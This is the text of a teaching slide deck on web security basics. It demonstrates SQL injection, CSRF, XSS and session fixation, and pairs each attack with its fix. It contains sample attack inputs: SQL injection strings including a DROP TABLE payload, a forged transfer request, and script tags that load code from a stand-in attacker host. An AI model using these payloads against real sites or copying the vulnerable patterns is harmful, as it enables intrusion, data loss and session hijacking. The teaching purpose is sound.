Slide 1

Security basics for web developers
Christoph Iserlohn

Slide 2

About me
>  Senior Consultant @ innoQ
>  MacPorts Team member

Slide 3

Why is security so important?
>  Adobe – September 2013: 152,000,000 records leaked, including encrypted passwords and encrypted credit card numbers and expiration dates
>  Korea Credit Bureau – January 2014: 20,000,000 records leaked, including social security numbers, phone numbers, credit card numbers and expiration dates
>  "The Fappening" – September 2014: intimate images of over a hundred celebrities leaked

Slide 4

Agenda
Common vulnerabilities in web applications ...and how to prevent them

Slide 5

OWASP Top 10
>  A1 Injection
>  A2 Broken Authentication and Session Management
>  A3 Cross-Site Scripting (XSS)
>  A4 Insecure Direct Object References
>  A5 Security Misconfiguration
>  A6 Sensitive Data Exposure
>  A7 Missing Function Level Access Control
>  A8 Cross-Site Request Forgery (CSRF)
>  A9 Using Components with Known Vulnerabilities
>  A10 Unvalidated Redirects and Forwards


Slide 7

Injection attacks

Slide 8

Injection explained
>  Untrusted data is sent to an interpreter
>  The interpreter is tricked into executing unintended commands
>  Problem: no clear separation of (untrusted) data from commands

Slide 9

SQL injection: "Exploits of a Mom" – by Randall Munroe. Licensed under CC BY-NC 2.5

Slide 10

Example (vulnerable: the query is built by string concatenation)

    String user = request.getParameter("user");
    String pwd = request.getParameter("pwd");
    String query =
        "SELECT * FROM user WHERE name = '" +
        user + "' AND pwd = '" + pwd + "'";
    Statement stmnt = conn.createStatement();
    ResultSet rs = stmnt.executeQuery(query);

Slide 11

Example
Parameters chosen by the attacker:

    name = admin
    pwd  = ' OR 1=1; --

Query that gets executed:

    SELECT * FROM user WHERE name = 'admin' AND pwd = '' OR 1=1; --'

Slide 12

Example
Parameters chosen by the attacker:

    name = admin
    pwd  = '; DROP TABLE users; --

Query that gets executed:

    SELECT * FROM user WHERE name = 'admin' AND pwd = ''; DROP TABLE users; --'

Slide 13

NoSQL = No injection?


Slide 15

NoSQL query languages

    // Cassandra – CQL
    session.execute(
        "SELECT * FROM users WHERE " +
        "first_name = 'jane' AND " +
        "last_name = 'smith';");

    // Neo4j – Cypher
    executionEngine.execute(
        "MATCH (p:Product) WHERE " +
        "p.productName = 'Chocolade' " +
        "RETURN p.unitPrice;");

Slide 16

NoSQL built-in interpreters
>  MongoDB: JavaScript
>  Redis: Lua
>  CouchDB: JavaScript
>  ...

Slide 17

Other attack vectors
>  XML parsers, XPath
>  Runtime.exec(), ProcessBuilder
>  SMTP headers, HTTP headers
>  LDAP
>  ...

Slide 18

Prevention
>  Use parameterized interfaces – e.g. prepared statements
>  Validate user input – prefer whitelists over blacklists
>  Sanitize user input – escape special characters sent to the interpreter

Slide 19

Example (fixed: parameterized query, the values are bound as data)

    String user = request.getParameter("user");
    String pwd = request.getParameter("pwd");
    String query =
        "SELECT * FROM user WHERE name = ? " +
        "AND pwd = ?";
    PreparedStatement stmnt =
        conn.prepareStatement(query);
    stmnt.setString(1, user);
    stmnt.setString(2, pwd);
    ResultSet rs = stmnt.executeQuery();
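The deck's snippets are Java; as an added illustration that is not part of the talk, the same contrast in Python against a constructed in-memory SQLite table, fed with the attacker parameters from slide 11 (the table contents are made up):

```python
import sqlite3

# Constructed in-memory stand-in for the deck's "user" table.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE user (name TEXT, pwd TEXT)")
conn.executemany("INSERT INTO user VALUES (?, ?)",
                 [("admin", "s3cret"), ("joe", "secret")])


def login_concat(user: str, pwd: str) -> list:
    """Vulnerable (slide 10): the parameters are concatenated into the SQL
    text, so an attacker-chosen value is parsed as part of the command."""
    query = ("SELECT * FROM user WHERE name = '" + user +
             "' AND pwd = '" + pwd + "'")
    return conn.execute(query).fetchall()


def login_prepared(user: str, pwd: str) -> list:
    """Fixed (slide 19): placeholders keep data and command apart; the
    driver binds the values and the SQL parser never sees them as SQL."""
    query = "SELECT * FROM user WHERE name = ? AND pwd = ?"
    return conn.execute(query, (user, pwd)).fetchall()


if __name__ == "__main__":
    # Attacker-chosen parameters from slide 11: "' OR 1=1; --" turns the
    # WHERE clause into (name='admin' AND pwd='') OR 1=1, i.e. every row.
    print(login_concat("admin", "' OR 1=1; --"))    # all rows
    print(login_prepared("admin", "' OR 1=1; --"))  # [] (no such password)
    print(login_prepared("joe", "secret"))          # [('joe', 'secret')]
```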

Slide 20

Cross-Site Request Forgery

Slide 21

CSRF explained
>  Attacker is able to predict all details of a request required to execute a particular action
>  Malicious web page generates forged requests that are indistinguishable from legitimate ones
>  Browsers send credentials like session cookies automatically

Slide 22

Meet our protagonists

Slide 23

The vulnerable web application

Slide 24

The victim

Slide 25

The attacker

Slide 26

The malicious website

Slide 27

The attacker tricks the victim into visiting the malicious website

Slide 28

    GET / HTTP/1.1
    Host: evil.example.com

Slide 29

    GET / HTTP/1.1
    Host: evil.example.com

    HTTP/1.1 200 OK

Slide 30

    GET /transfer?from=victim&to=attacker&amount=100 HTTP/1.1
    Host: vulnerable.example.com
    Cookie: sessionID=48839ca9-a91f-aff3-df60-11147d694336

    HTTP/1.1 200 OK

Victim's browser sends the forged request, including the session cookie (if the user is logged in)


Slide 32

The vulnerable website thinks the request is legitimate and executes the transaction

Slide 33

I'm safe. I'm using POST.

Slide 34

Safe. Really?

Slide 35

    GET / HTTP/1.1
    Host: evil.example.com

Slide 36

    GET / HTTP/1.1
    Host: evil.example.com

    HTTP/1.1 200 OK

Slide 37

    GET / HTTP/1.1
    Host: evil.example.com

    HTTP/1.1 200 OK

    window.onload = function() {
        document.getElementById("forged").submit();
    }

The malicious page carries a hidden form with id "forged" (its markup is missing from the slide text) and submits it as soon as the page has loaded


Slide 39

POST requests are not immune to CSRF!

Slide 40

Multi-step interactions are just as vulnerable!

Slide 41

Or WebSocket connections!

Slide 42

Or your JSON APIs!

Slide 43

Prevention
>  Use CSRF tokens for each request – unique/secret, linked to the session
>  Require reauthentication before critical operations
>  Use the double submit pattern for requests from JavaScript – or when there is no session
>  Check for application/json (Content-Type) on JSON APIs

Slide 44

CSRF token example

Slide 45

    GET /transfer HTTP/1.1
    Host: csrf-safe.example.com

Every time a user requests a page that includes a form ...

Slide 46

... the form is enriched with a unique CSRF token in a hidden field named csrf (the form markup is missing from the slide text)


Slide 48

The attacker can't know the value of csrf

Slide 49

    GET / HTTP/1.1
    Host: evil.example.com

Slide 50

    GET / HTTP/1.1
    Host: evil.example.com

    HTTP/1.1 200 OK

The malicious page again contains a forged form (markup missing from the slide text), but cannot fill in a valid csrf value


Slide 52

    POST /transfer HTTP/1.1
    Host: csrf-safe.example.com
    Cookie: sessionID=48839ca9-a91f-aff3-df60-11147d694336

    from=victim&to=attacker&amount=100&csrf=????

Victim's browser sends the forged request, including the session cookie (if the user is logged in)

Slide 53

The website checks the value of csrf and rejects the forged request even though it contains a valid session cookie
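The token flow of slides 44 to 53 in Python, as an added example that is not from the talk (the talk's stack is Java). The session store, the /transfer form and the request dicts are constructed; the check ties the submitted csrf value to the session named by the cookie, which is what defeats the forged request on slide 52:

```python
import hmac
import secrets

# Constructed server-side session store: sessionID cookie value -> session data.
SESSIONS = {}


def new_session() -> str:
    """Create a session and bind a fresh random CSRF token to it."""
    sid = secrets.token_hex(16)
    SESSIONS[sid] = {"csrf": secrets.token_urlsafe(32)}
    return sid


def render_transfer_form(session_id: str) -> str:
    """Slide 46: the form is enriched with the session's token."""
    token = SESSIONS[session_id]["csrf"]
    return ('<form method="POST" action="/transfer">'
            f'<input type="hidden" name="csrf" value="{token}">'
            '<input name="to"><input name="amount"></form>')


def handle_transfer(cookie_sid: str, form: dict) -> str:
    """Slide 53: reject unless the submitted csrf matches the token bound
    to the session the cookie identifies, valid cookie or not."""
    session = SESSIONS.get(cookie_sid)
    if session is None:
        return "401 no session"
    # Constant-time comparison: the token check must not leak timing.
    expected, got = session["csrf"].encode(), form.get("csrf", "").encode()
    if not hmac.compare_digest(expected, got):
        return "403 forged request rejected"
    return f"200 transferred {form['amount']} to {form['to']}"


def demo() -> tuple:
    sid = new_session()
    # Slide 52: the browser attaches the cookie, but the attacker's page can
    # only guess the token (csrf=????).
    forged = handle_transfer(sid, {"from": "victim", "to": "attacker",
                                   "amount": "100", "csrf": "????"})
    # Legitimate submission of the form rendered for this very session.
    token = SESSIONS[sid]["csrf"]
    legit = handle_transfer(sid, {"from": "victim", "to": "alice",
                                  "amount": "100", "csrf": token})
    return forged, legit
```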

Slide 54

Cross-Site Scripting

Slide 55

XSS explained
>  Web page includes user-supplied (untrusted) data
>  The data is not properly validated or escaped
>  Attacker can execute scripts in the victim's browser

Slide 56

Reflected XSS

Slide 57

Attacker crafts a special link:

    http://vulnerable.example.com/?q=cats<script src="http://evil.example.com/pwn.js"/>


Slide 59

Attacker crafts a special link (URL-encoded):

    http://vulnerable.example.com/?q=cats%3Cscript%20src%3D%E2%80%9Chttp%3A%2F%2Fevil.example.com%2Fpwn.js%E2%80%9C%2F%3E%0A

Slide 60

The attacker tricks the victim into clicking the malicious link

Slide 61

    GET /?q=cats<script src="http://evil.example.com/pwn.js"/> HTTP/1.1
    Host: vulnerable.example.com

Victim's browser sends the request (query URL-encoded on the wire) to the vulnerable website

Slide 62

Vulnerable website includes the query parameter in the response:

    Results for cats<script src="http://evil.example.com/pwn.js"/>:


Slide 64

Victim's browser includes the script from the malicious website:

    GET /pwn.js HTTP/1.1
    Host: evil.example.com

    Results for cats<script src="http://evil.example.com/pwn.js"/>:

Slide 65

Victim's browser executes the script in the context of the vulnerable website

    Results for cats<script src="http://evil.example.com/pwn.js"/>:

Slide 66

The script can:
>  hijack the victim's session
>  insert hostile content
>  redirect the user

Slide 69

Persistent XSS

Slide 70

Attacker injects the script directly into site content (e.g. in a comment):

    I love cats <script src="http://evil.example.com/pwn.js" />

Slide 71

Vulnerable website includes the malicious script in every response:

    I love cats <script src="http://evil.example.com/pwn.js" />

Slide 72

The script can:
>  hijack the victim's session
>  insert hostile content
>  redirect the user
All users are affected

Slide 74

Other XSS types
>  DOM-based XSS – reflected by JavaScript code on the client side
>  Universal XSS – exploits vulnerabilities in the browser

Slide 75

Prevention
>  Use contextual (HTML, JavaScript, CSS) output escaping/encoding
>  Validate & sanitize user input – prefer whitelists over blacklists
>  Protect session cookies with httpOnly
>  Use Content-Security-Policy headers to limit where external resources can be loaded from

Slide 76

Properly escaped output: the response carries the comment as text, not as markup

    I love cats &lt;script src=&quot;http://evil.example.com/pwn.js&quot; /&gt;

so the browser displays it literally as

    I love cats <script src="http://evil.example.com/pwn.js" />
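Contextual escaping from slides 75 and 76, as an added Python example that is not from the talk: the same comment is rendered once into HTML text and once into a JavaScript string literal, and each insertion point gets the escaper for its context (the comment value and the page template are constructed):

```python
import html
import json

# Constructed comment carrying the deck's payload (slides 59 and 70).
COMMENT = 'I love cats <script src="http://evil.example.com/pwn.js" />'


def escape_html_text(s: str) -> str:
    """HTML context (text between tags or inside a quoted attribute):
    & < > " ' become entities, so markup in the data stays inert."""
    return html.escape(s, quote=True)


def escape_js_string(s: str) -> str:
    """JavaScript string-literal context inside a <script> block. HTML
    entities are useless here; the value is JSON-encoded and < > & are
    written as \\uXXXX escapes so the data can never end the script element."""
    return (json.dumps(s)
            .replace("<", "\\u003c")
            .replace(">", "\\u003e")
            .replace("&", "\\u0026"))


def render_vulnerable(comment: str) -> str:
    """Slide 71: the raw comment is pasted into the page."""
    return "<p>" + comment + "</p>\n"


def render_escaped(comment: str) -> str:
    """Slide 76: every insertion point uses the escaper for its context."""
    return ("<p>" + escape_html_text(comment) + "</p>\n"
            "<script>var lastComment = " + escape_js_string(comment)
            + ";</script>\n")


if __name__ == "__main__":
    print(render_vulnerable(COMMENT))   # browser loads pwn.js
    print(render_escaped(COMMENT))      # browser shows the text literally
```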

Slide 77

Session Management

Slide 78

The threat
>  Flaws in session management allow an attacker to steal accounts or impersonate users

Slide 79

Common flaws
>  Session IDs are exposed in the URL
>  Session IDs don't time out
>  Session IDs aren't changed after login
>  Session IDs aren't invalidated during logout
>  Session IDs are predictable

Slide 80

Session fixation

Slide 81

Attacker establishes a valid session

Slide 82

    https://vulnerable.example.com/?ID=48839ca

Attacker gets a session ID


Slide 84

The attacker tricks the victim into logging in with the provided link:

    https://vulnerable.example.com/login?ID=48839ca


Slide 86

    POST /login?ID=48839ca HTTP/1.1
    Host: vulnerable.example.com

    user=joe&pwd=secret

Victim logs into the vulnerable website

Slide 87

    HTTP/1.1 303 See Other
    Location: https://vulnerable.example.com/?ID=48839ca

Vulnerable website doesn't create a new session

Slide 88

Attacker knows the victim's session ID and has access to his account

Slide 89

Prevention
>  Store session IDs in cookies – use the httpOnly flag if possible
>  Create a new session after login – (see HttpServletRequest)
>  Properly invalidate sessions – during logout or due to inactivity
>  Use unpredictable session IDs – (e.g. don't use java.util.Random)
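The fixation scenario of slides 82 to 88 and the "new session after login" fix from slide 89, as an added Python example that is not from the talk (the talk's stack is Java). The session store is constructed; the vulnerable login keeps the planted ID, the fixed login rotates it:

```python
import secrets

# Constructed session store: session ID -> session data. The deck's vulnerable
# app takes the ID from the URL and keeps it across login (slides 82 to 87).
SESSIONS = {}

def new_session_id() -> str:
    """128 bits from the OS CSPRNG (slide 89: not java.util.Random)."""
    return secrets.token_urlsafe(16)

def start_session(requested_id: str = None) -> str:
    """Vulnerable habit: honour a caller-supplied ID, which is what lets the
    attacker plant one (the ID belongs in a cookie, not in the URL)."""
    sid = requested_id or new_session_id()
    SESSIONS.setdefault(sid, {"user": None})
    return sid

def login_vulnerable(sid: str, user: str) -> str:
    """Slide 87: authenticate but keep the pre-login ID."""
    SESSIONS[sid]["user"] = user
    return sid

def login_fixed(sid: str, user: str) -> str:
    """Slide 89: create a new session after login. The data moves to a fresh
    ID and the old ID is dropped, so a planted ID never becomes authenticated."""
    data = SESSIONS.pop(sid, {"user": None})
    data["user"] = user
    new_sid = new_session_id()
    SESSIONS[new_sid] = data
    return new_sid

def logout(sid: str) -> None:
    """Slide 89: invalidate server-side, not just clear the cookie."""
    SESSIONS.pop(sid, None)

def whoami(sid: str):
    session = SESSIONS.get(sid)
    return session["user"] if session else None

def demo() -> tuple:
    planted = "48839ca"                 # ID the attacker obtained (slide 82)
    login_vulnerable(start_session(planted), "joe")
    hijacked = whoami(planted)          # "joe": the attacker's ID is joe's session
    logout(planted)
    fresh = login_fixed(start_session(planted), "joe")
    # planted ID now maps to nothing; only the fresh ID is joe's session
    return hijacked, whoami(planted), whoami(fresh), fresh != planted
```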

Slide 90

Summary
>  Validate & sanitize all user input
>  Properly escape/encode output
>  Protect your forms with CSRF tokens
>  Harden your session management

Slide 91

Tools that can help
>  Spring: Spring Framework, Spring Security
>  OWASP: CSRFGuard, HTML Sanitizer, ESAPI
>  Apache: Commons Lang, Commons Validator
>  Java EE: Bean Validation (JSR-303), JSF (2.2)

Slide 92

Watch out for...
>  Vulnerabilities in 3rd-party components
>  Security (mis)configuration
>  Proper access control

Slide 93

Thank you!
>  Questions?
>  Comments?
Christoph Iserlohn
[email protected]